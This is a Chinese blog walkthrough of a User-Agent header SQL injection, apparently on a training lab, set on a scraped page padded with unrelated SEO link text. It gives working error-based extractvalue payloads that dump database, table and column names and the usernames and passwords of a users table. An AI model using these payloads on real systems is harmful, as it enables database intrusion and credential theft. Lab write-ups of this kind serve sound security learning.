当前位置: 首页 > wzjs >正文

做贸易的都有什么网站小程序

做贸易的都有什么网站,小程序,换空间网站备案,外国出名的设计网站一:判断注入类型 先在用户名和密码框尝试判断,发现都得不到需要的回显 所以查看源码 可以发现username和password的输入后端都做了检查,没法直接注入 所以我们尝试uagent注入 UA注入: 没有url解码处理只识别原始空格&#xff…

一:判断注入类型

先在用户名和密码框尝试判断,发现都得不到需要的回显

所以查看源码

可以发现username和password的输入后端都做了检查,没法直接注入

所以我们尝试uagent注入

UA注入:

  • 没有url解码处理
  • 只识别原始空格,+,%20都不作为空格解析
  • 在User-agent字段中注入

先用一组密码登录,bp抓包 

构造判断的payload 

User-Agent: 1
User-Agent: 1'
User-Agent: 1"
User-Agent: 1')
User-Agent: 1")

单引号的时候产生不同的回显 

其余均为

确定为单引号字符型,尝试闭合

闭合成功但报错,其他几种情况闭合均无回显,所以我们尝试报错注入

二:开始注入

 1.爆数据库名

User-Agent: 1' and extractvalue(1,concat(0x7e,(database())))='1

2.爆表名

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))='1

3.爆列名 

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))='1

 4.爆数据

看数据量

User-Agent: 1' and extractvalue(1,concat(0x7e,(select count(*) from users)))='

分两次爆数据

extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))
extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))

 ❀❀❀ 完结撒花!!!❀❀❀

http://www.dtcms.com/wzjs/301483.html

相关文章:

  • 网站建设的一般步骤包含哪些it培训机构哪家好
  • 桂林建网站免费发布产品信息的网站
  • 门户网站模板 htmlseo引擎优化培训
  • 网站被k的表现永久免费自助建站系统
  • 宣城做网站windows优化大师是什么软件
  • wordpress添加网站图标郑州疫情最新动态
  • 做网站选哪家公司seo优化工作有哪些
  • wordpress主题justnewswin7优化工具哪个好用
  • 福建工程建设管理中心网站西安网站设计开发
  • 电白网站开发公司网上店铺的推广方法有哪些
  • 建设网站报价单百度seo发帖推广
  • 如何在社交网站上做视频推广厦门百度快照优化排名
  • 做搜狗网站优化点击软灰色关键词排名方法
  • 制作旅游网站网页的代码百度小说风云榜排名完结
  • 磁力搜索网站怎么做的众志seo
  • 银川住房城乡建设委官方网站百度关键字
  • 网站开发的时间流程软件开发培训学校
  • 上海网站建设流程seo网络培训机构
  • 高端网站建设的市场seo优化销售话术
  • 做机械设计兼职的网站百度推广一个月费用
  • 2017自己做网站的趋势网络营销岗位职责和任职要求
  • 深圳网站建设培训班网站制作教程
  • 浦东新区办营业执照哪里办seo研究中心vip课程
  • 网站建设维护价格国内10大搜索引擎
  • 网站防护找谁做网站查询服务器
  • 宁波最新消息今天临沂seo全网营销
  • 用ssh做的网站百度seo优化分析
  • 长沙网站制作的站长统计网站统计
  • 单页面网站设计网站欣赏私人浏览器
  • 网站建设智能小程序橘子seo历史查询